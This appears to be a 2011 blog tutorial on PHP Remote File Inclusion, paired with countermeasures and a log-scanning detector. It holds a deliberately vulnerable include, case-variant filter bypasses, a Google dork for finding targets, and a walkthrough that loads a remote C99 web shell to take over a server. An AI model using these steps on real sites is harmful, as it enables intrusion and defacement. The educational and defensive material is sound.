Monday, September 5, 2011

Remote File Inclusion (RFI)

What is Remote File Inclusion?

It is a vulnerability found in web applications that allows an attacker to include and run a remote file (script) on the server, which can compromise the whole system. It occurs because user input is not properly validated. In this tutorial I will explain how the attack works and how to avoid or counter this kind of attack.
I am using PHP in this tutorial to explain RFI, firstly because it is the most widely used language and secondly because I am very comfortable with it ;). The concept of RFI remains the same for all languages.


Understanding RFI:
Before we start we must be familiar with the PHP include() function and its relatives (require()). These functions run another file inside the current page. Let's look at a simple example to get a clear idea of how include() works. See the code below:
This is index.php (exploitable code):

<?php
if(isset($_GET['page']))   // true only when the request carried a ?page= value
{
   $page=$_GET['page'];    // store the requested page name in a variable
   include($page.".php");  // display the page: the user-controlled value goes straight into include()
}
else{
?>
<html>
<h1>This is an example for RFI</h1>
click here for <a href="/index.php?page=rfi1">RFI1</a><br/>

click here for <a href="/index.php?page=rfi2">RFI2</a>
</html>
<?php
}
?>
If you understand the above code, skip the explanation part.

Explanation:
Let's say the URL of this page is www.mysite.com/index.php.
Directory structure:
--mysite.com
     |--index.php
     |--rfi1.php
     |--rfi2.php
You may be wondering what happens if you open this URL in the browser for the first time. The answer is the page shown in the screenshot below.

[Screenshot: index.php as first loaded, showing only the heading and the two links]
Now you may be wondering what happened to the PHP code written in the first few lines.
Let's see: isset($_GET['page']) returns true only if the GET parameter "page" has some value. When you first open the URL, no page parameter is present, so isset() returns false, and that is why you saw the else part of the page, which is plain HTML. Now the big question is: what is this "value", and where does it come from? The answer is the link index.php?page=rfi1 inside the HTML block. Whenever we click this link we call index.php again and pass the value "rfi1" in the GET parameter, that is, we request the page rfi1 from the same site. After you click the link, the "if" condition is satisfied, the contents of "rfi1.php" are included in the current page using include(), and the URL changes to www.mysite.com/index.php?page=rfi1.


Finding Vulnerability:
The example I gave is clearly vulnerable; let's see how. Suppose I now request a page "rfi3". As we know, there is no rfi3.php in the directory, so the page shows an error something like this:

[Screenshot: PHP include() warning for the missing file rfi3.php]

If a website shows such an error, the user input is not being filtered and the page is vulnerable. You may be a little confused by this example, so let's take a simpler test for whether a page is vulnerable: type www.mysite.com/index.php?page=http://google.com? and if you get the Google page, the page is clearly vulnerable. If you observed carefully, I put a "?" at the end of the URL; without it, include() would try to include "http://google.com.php" (because of include($page.".php")) rather than "http://google.com".
Sometimes, to secure the website, the programmer checks whether the GET argument contains "http://" or "www" and refuses to include the page if it does, but such checks can be bypassed with variants like "HTtp://" or "WWw".
A smarter programmer converts the whole path to lowercase before checking the same condition.
Note: Sometimes you may get an error like "http:// wrapper is disabled in the server configuration by allow_url_fopen...". That means allow_url_fopen and allow_url_include are turned off in php.ini, and you are out of luck in this situation, at least as far as RFI is concerned.
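The same tell-tale pattern that reveals the vulnerability (a URL, or a case-variant of one, arriving in the page parameter) is also what a defender should look for in the web server's access log. The following is an added example, not code from the original post: a small PHP script that scans Apache-style access log lines and flags requests whose "page" parameter looks like a remote resource. The log lines are constructed for this example, and the parameter name "page" is taken from the vulnerable index.php above.

```php
<?php
// Added example (not from the original post): flag access-log requests whose "page"
// parameter carries a URL, as an RFI probe would. The log lines below are constructed.
declare(strict_types=1);

$sampleLog = <<<'LOG'
203.0.113.5 - - [05/Sep/2011:10:01:02 +0000] "GET /index.php?page=rfi1 HTTP/1.1" 200 512
203.0.113.7 - - [05/Sep/2011:10:01:09 +0000] "GET /index.php?page=http://google.com? HTTP/1.1" 200 8192
203.0.113.7 - - [05/Sep/2011:10:01:15 +0000] "GET /index.php?page=HTtp://example.net/shell.txt HTTP/1.1" 200 4096
203.0.113.9 - - [05/Sep/2011:10:02:00 +0000] "GET /index.php?page=rfi3 HTTP/1.1" 200 300
LOG;

/** Returns the URL-decoded value of $param in a request target, or null when absent. */
function queryParam(string $target, string $param): ?string
{
    $qpos = strpos($target, '?');
    if ($qpos === false) {
        return null;
    }
    parse_str(substr($target, $qpos + 1), $params);   // parse_str also percent-decodes
    return (isset($params[$param]) && is_string($params[$param])) ? $params[$param] : null;
}

/**
 * True when the value looks like a remote or wrapper resource rather than a plain page
 * name: any "scheme:" prefix (http:, HTtp:, ftp:, php:, data:) or a protocol-relative "//".
 * The /i flag catches the mixed-case variants that defeat a naive "http://" blacklist.
 */
function looksRemote(string $value): bool
{
    return (bool) preg_match('#^\s*(?:[a-z][a-z0-9+.-]*:|//)#i', $value);
}

/** Returns the suspicious requests as [clientIp, pageValue] pairs. */
function findRfiProbes(string $log): array
{
    $hits = [];
    foreach (explode("\n", trim($log)) as $line) {
        // Common Log Format: ip ident user [time] "METHOD target HTTP/x" status bytes
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) /', $line, $m)) {
            continue;
        }
        $page = queryParam($m[2], 'page');
        if ($page !== null && looksRemote($page)) {
            $hits[] = [$m[1], $page];
        }
    }
    return $hits;
}

// On the constructed sample this reports the two requests from 203.0.113.7;
// the plain "rfi1" and the missing "rfi3" are not flagged.
foreach (findRfiProbes($sampleLog) as [$ip, $page]) {
    printf("possible RFI probe from %s: page=%s\n", $ip, $page);
}
```

In a real deployment you would feed the live access log through findRfiProbes() and alert on any hit, and you would also watch for the PHP warning from a non-existent local file (the rfi3 case above) in the error log, since that is the probe an attacker runs first.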


Use of Google Dorks to Find Vulnerability: Let's say you want to see whether any page of a website (say abc.com) is vulnerable. Type
site:abc.com inurl:?page= into Google search; it will return all pages of the form anything.com?page=anything belonging to abc.com. See dorks to understand this.
Find out for yourself how to use the dork efficiently for RFI.


How to perform RFI Attack:
Okay, we found the vulnerability; now the question is how to get into the website. To deface a website we need a shell script, for example the C99 shell, which works like a file explorer (similar to Windows Explorer). To get a feel for this script, upload it to my3gb.com and open the uploaded URL after signing out: you will still be able to manage the files and folders in your account. So, somehow we have to upload or run this "shell" on the victim's server. If you can upload the script directly, do so and open the path where it was uploaded. Otherwise we can use our vulnerable page to run it. First upload your shell script to a remote server, say "abc.com/shell.txt". We have our vulnerable link www.mysite.com/index.php?page=, so now try the URL www.mysite.com/index.php?page=http://abc.com/shell.txt and tadaa!! you have access to the "mysite.com" server. You may be wondering why I used "shell.txt" and not "shell.php": if we used shell.php it would run on the remote server rather than on the victim's server, which is not what we want.


Countermeasures:
1. Always set allow_url_include and allow_url_fopen to "Off" in php.ini unless they are really needed.
2. Filter the input. For example, check the GET argument for "http://" or "www": first convert it to lowercase, then check whether it contains these strings.
3. Use a switch (select case) or an if-else chain so that only known pages can be included. Let's see how to modify the same code using if-else.

<?php
if(isset($_GET['page']))     // true only when the request carried a ?page= value
{
   if($_GET['page']==="rfi1")   // === (comparison), not = (assignment, which would always be true)
   {
      include("rfi1.php");      // display the page rfi1 (the file name is a fixed string, never user input)
   }
   elseif($_GET['page']==="rfi2")
   {
      include("rfi2.php");      // display the page rfi2.
   }
   else{
      // unknown page: go back to index.php without the parameter.
      // include("index.php") here would re-run this file with the same $_GET and recurse forever.
      header("Location: /index.php");
      exit;
   }
}
else{
?>
<html>
<h1>This is an example for RFI</h1>
click here for <a href="/index.php?page=rfi1">RFI1</a><br/>
click here for <a href="/index.php?page=rfi2">RFI2</a>
</html>
<?php
}
?>
This code ensures that if none of the conditions is satisfied, the else branch runs and the user is sent back to index.php; the file name passed to include() is now always a fixed string, never the raw GET value.
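The if-else chain above grows one branch per page. The following is an added example, not the original post's code, that applies the same idea (countermeasures 1 and 3) in a form that scales: an allowlist array maps the accepted ?page= values to file names, so user input is only ever a lookup key, and a runtime check confirms the php.ini switches from countermeasure 1 are off. It assumes the directory layout from the explanation above (rfi1.php and rfi2.php beside index.php); the function names are my own.

```php
<?php
// Added example, not the original post's code: an allowlist-based replacement for
// include($page . ".php"). User input is only ever used as an array key, so a value
// such as "http://abc.com/shell.txt", "HTtp://..." or "../../etc/passwd" can never
// reach include(); it simply is not a key in PAGES.
declare(strict_types=1);

// The only pages that may be included, keyed by the value accepted in ?page=
// (assumed layout: rfi1.php and rfi2.php live beside this index.php).
const PAGES = [
    'rfi1' => 'rfi1.php',
    'rfi2' => 'rfi2.php',
];

/**
 * Returns the absolute path of the page to include, or null when the request is
 * absent, not a string, or not in the allowlist. The lookup is exact (case-sensitive,
 * no trimming), so "RFI1", "rfi1.php" and "rfi1?" are all rejected.
 */
function resolvePage(mixed $requested): ?string
{
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    return __DIR__ . DIRECTORY_SEPARATOR . PAGES[$requested];
}

/**
 * Defence in depth: confirm the php.ini directives from countermeasure 1 are off.
 * ini_get() returns "" or "0" for a disabled boolean directive, "1" when enabled.
 */
function remoteIncludesDisabled(): bool
{
    return !filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)
        && !filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN);
}

if (!remoteIncludesDisabled()) {
    // Misconfiguration worth surfacing even though the allowlist already blocks URLs.
    error_log('warning: allow_url_include/allow_url_fopen are enabled in php.ini');
}

$page = resolvePage($_GET['page'] ?? null);

if ($page !== null) {
    include $page;   // only ever one of the allowlisted local files
} else {
    if (isset($_GET['page'])) {
        // Unknown page: log it, because a value like "http://..." is a probe worth noticing.
        error_log('rejected page parameter: ' . var_export($_GET['page'], true));
        http_response_code(404);
    }
?>
<html>
<h1>This is an example for RFI</h1>
click here for <a href="/index.php?page=rfi1">RFI1</a><br/>
click here for <a href="/index.php?page=rfi2">RFI2</a>
</html>
<?php
}
```

Adding a page means adding one line to PAGES rather than another elseif, and because the rejected branch answers 404 and logs the offending value, the "rfi3" and "http://google.com?" probes from the Finding Vulnerability section no longer produce the revealing include() warning but do leave a trace in the error log.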
